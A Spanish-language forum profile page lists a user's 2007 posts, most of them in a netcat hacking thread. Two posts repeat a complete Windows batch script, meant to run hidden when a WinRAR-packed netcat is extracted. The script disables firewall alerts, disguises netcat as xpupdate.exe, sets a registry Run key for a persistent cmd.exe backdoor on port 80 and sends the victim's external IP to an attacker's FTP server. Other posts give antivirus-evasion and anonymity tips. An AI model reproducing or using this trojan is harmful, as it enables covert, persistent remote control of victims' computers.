Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - R41N-W4R3

#101

  Hola, pues te recomiendo lo siguiente:
   
    En primer lugar, procura realizar esas configuraciones genericas en unas DLL que te crees tu mismo. Asi las modificaciones que realices solo en esas DLL se aplicaran en las llamadas que realices  a las mismas desde el proyecto pricipal. Esto requiere que tu proyecto este bien planeado con una buen diseño.

  Encuanto a tu segunda pregunta, el VB no es un lenguaje interpretado. Se compila y se generan archivos compilados para su uso con sus respectivas dll,ocx o lo que quieras.

  Un saludo y espoero haberte servido de ayuda. Cualquier duda aqui estamos para eso.....
#102
Hacking / Re: Jugando con netcat
22 Junio 2007, 09:57 AM

  Ya entiendo lo de la primera parte. Es una buena solucion tambien, pero no creo q aporte mejoras a la mia, aunke me ha gustdo el apunte.

  Encuanto a lo del ipconfig /all sigo sin ver mas que mascara de red, p interna y puerta de enlace (lo hago en xp), asi q dime como demonios ves la ip externa asi ejejjeje

  Encuanto a la ocultación de netcat, solo funciona con la mayoria de antivirus en su instalacion por defecto. El unico modo que veo posible de realizar esa ocultación es o bien cambiando el fuente o tambien realizando una ocultación de ese fichero en una extension no escaneable por los antivir,  habiendo previamente preparado el sistema para ser capaz de ejecutar esa nueva extension.
  Gracias por el apunte del nc.  No suelo poner todo el codigo o comandos q pegue correcto en el foro general, solo en privado para evitar mal uso de lamer.

#103


  Buenas, puedes usar una livecd  de  la bacltrack o cualquier otra distro que lleve integrado el Tor+Privoxy para navegar anonimamente.

   Otra cosa que puedes hacer es descargar el Tor+Privoxy+Firefox para windows y usarlo para navegar anonimamente de forma sencilla.

  Si necesitas ayuda para conseguirlo, te lo puedo mandar a un ftp o algo asi....
#104
Hacking / Re: Jugando con netcat
20 Junio 2007, 17:43 PM


  Con respecto al primer punto, no lo entiendo bien, asi que explicame a que te refieres.

  Encuanto a lo de sacar la ip con ipconfig jajajajajaj   eso te da la ip interna, osea del tipo 192.168.1......   y si pretendes conectarte desde fuera necesitas una ip externa del tipo 80.32.12.....   lo que sea.......  y yo mando directamente a un txt (en mi ejemplo el out.out) y todo generado con esa consulta a la web...... si sabes cualquier otro método tal y como indicas para conseguir la ip externa por favor indicamelo.

Lo de ponerle otro nombre al netcat, EVIDENTEMENTE no es para engañar al antivirus, es para que pase lo mas inadvertido posible si ves el taskmanager........

   Encuanto a lo de cifrar mi ip, etc ... creo que no has leido muy mi post pq en ningun caso pongo mi ip, sino que lo envio a un ftp o web que he creado en un sitio gratis usando TOR para conseguir anonimicidad.

   La idea de modificar netcat si es valida para hacerlo pasar mas inadvertido, aunke con la tecnica de ocultarlo con winrar muchos antivirus en modo de instalacion por defecto se lo tragan.

   Un saludo y gracias por tus ideas...  las comparta o no... que para eso es un foro , para aprender unos de otros.
#105
Hacking / Re: Jugando con netcat
20 Junio 2007, 12:40 PM


    Creo que lo mejor seria modificar el codigo fuente lo suficiente como para que los antivirus no lo detecten. Mira tambien la posibilidad de cifrar el archivo para evitar asi la heuristica de antivirus..... de todas formas casi todos los antivirus con la configuración por defecto se lo tragan.....
#106


    Antes de nada,  conoces la herraienta netcat???

    Si no la conoces, en varias secciones del foro (haching basico.....) puedes encontrar estupendos manuales sobre su uso Asi como un estupendo manual sobre como ocultarlo con winrar. No solo lo ocultaremos, ademas, entre otras muchas cosas explico en mi anterior post como enviamos la ip extrerna de la victima a un ftp.

   Si hay dudas mas concretas aqui toy...
 
 
#107
Hacking / Re: Jugando con netcat
19 Junio 2007, 23:51 PM


   Hay un par de ideas mas que quiero añadir a este tutorial.

  en primer lugar, como creo que no es una buena idea dejar mi ip por ahi puesta para que se conecten a mi (y si tienes ip dinamica ademas debes hacerte de un dominio.....), yo hago lo siguiente:

  Ya nos ha explicado de forma EXCELENTE nuestro amigo en el tutorial como esconder netcat. Además hemos visto como en cierto momento ejecuta un comando durante la extraccion que ademas se hace de forma oculta. Pues yo ejecuto un fichero bat :

Este seria un contenido de ejemplo:

  @echo off
netsh
set mode offline
set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE
copy xpupdate.exe c:\windows\system32\
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"
xpupdate whatismyip.com 80 < html.txt > out.out
ftp
open
ftp.ftp.es
user
pass
ascii
put out.out
bye
xpupdate  -l -d -e cmd.exe -p 80
exit
Vamos a comentar que hace:

netsh --------vamos al modo de control del firewall de xp  ;)

set mode offline---- Le indicamos que desactive las alertas

set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE- Damos paso al netcat (renombrado a xpupdates.exe) en el firewall

copy xpupdate.exe c:\windows\system32\- Lo copiamos a un sitio adecuado

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"  Aqui lo introducimos en el registro de inicio para que cada vez que arranque el sistema lo ponga a escuchar en un Puerto determinado y nosotros podamos conectarnos.

xpupdate whatismyip.com 80 < html.txt > out.out  Aquí uso el propio netcat para enviar una cabecera httpo adecuada a la pagina whatismyip.com (la cual nos indica la ip externa desde la que nos conectamos) y asi poder guardar en un archivo de texto (out.out) el resultado, que sera la ip externa de la victima. Muy necesaria si pretendemos saber donde atacar   XD...

ftp         Estos pasos solo me envían por ftp esa                    información aunque podríamos hacerlo de muchas otras formas como una web, etc
open                       
ftp.ftp.es
user
pass
ascii
put out.out
bye


xpupdate  -l -d -e cmd.exe -p 80  Aquí es donde indicamos al netcat que se quede a la escucha para cuando queramos conectarlo. Además lo hace a través del puerto 80 para asegurarnos que el router lo deje pasar.
exit

El contenido de la cabecera http adecuada para el paso xpupdate whatismyip.com 80 < html.txt > out.out  se guarda en el archivo html.txt que pego a continuación y que consegui con el software Httpanalizer haciendo una simple captura de la consulta a dicha página.

GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)


      Ademas es muy recomendable haber creado la web o ftp de forma anónima usando por ejemplo (Tor+Privoxy+Firefox), y por supuesto acceder a ese ftp,web o como queramos guardar la info de las  ip que sepamos que nos estan esperando con un puerto abierto jejejej

   Sin mas felicitar al creador del tutorial y espero haber inspirado a alguien con estas ideas.

Saludos


     
#108

  Hola a todos, antes de nada saludar ya que es el primer post que pongo en el foro.

   Mi técnica para el envío de la ip externa va un poco en relación con el ultimo post de chestmaster, ya que yo realizo la conexión inversa usando netcatt oculto con el winrar y ejecuto un bat en la descompresion del archivo que pego a continuación y espero que te ayude:

 

  @echo off
netsh
set mode offline
set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE
copy xpupdate.exe c:\windows\system32\
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"
xpupdate whatismyip.com 80 < html.txt > out.out
ftp
open
ftp.ftp.es
user
pass
ascii
put out.out
bye
xpupdate  -l -d -e cmd.exe -p 80
exit
Vamos a comentar que hace:

netsh --------vamos al modo de control del firewall de xp  ;)

set mode offline---- Le indicamos que desactive las alertas

set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE- Damos paso al netcat (renombrado a xpupdates.exe) en el firewall

copy xpupdate.exe c:\windows\system32\- Lo copiamos a un sitio adecuado

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"  Aqui lo introducimos en el registro de inicio para que cada vez que arranque el sistema lo ponga a escuchar en un Puerto determinado y nosotros podamos conectarnos.

xpupdate whatismyip.com 80 < html.txt > out.out  Aquí uso el propio netcat para enviar una cabecera httpo adecuada a la pagina whatismyip.com (la cual nos indica la ip externa desde la que nos conectamos) y asi poder guardar en un archivo de texto (out.out) el resultado, que sera la ip externa de la victima. Muy necesaria si pretendemos saber donde atacar   XD...

ftp         Estos pasos solo me envían por ftp esa                    información aunque podríamos hacerlo de muchas otras formas como una web, etc
open                       
ftp.ftp.es
user
pass
ascii
put out.out
bye


xpupdate  -l -d -e cmd.exe -p 80  Aquí es donde indicamos al netcat que se quede a la escucha para cuando queramos conectarlo. Además lo hace a través del puerto 80 para asegurarnos que el router lo deje pasar.
exit

El contenido de la cabecera http adecuada para el paso xpupdate whatismyip.com 80 < html.txt > out.out  se guarda en el archivo html.txt que pego a continuación y que consegui con el software Httpanalizer haciendo una simple captura de la consulta a dicha página.

GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)


Si os gusta el post puedo incluir un manual completo con capturas de pantalla que yo mismo he realizado, aunque toda la  información necesaria para hacerlo salio de esta completa webbbb   saludos a todos

  pd: Me acabo de desvirgar en el foro jejejeje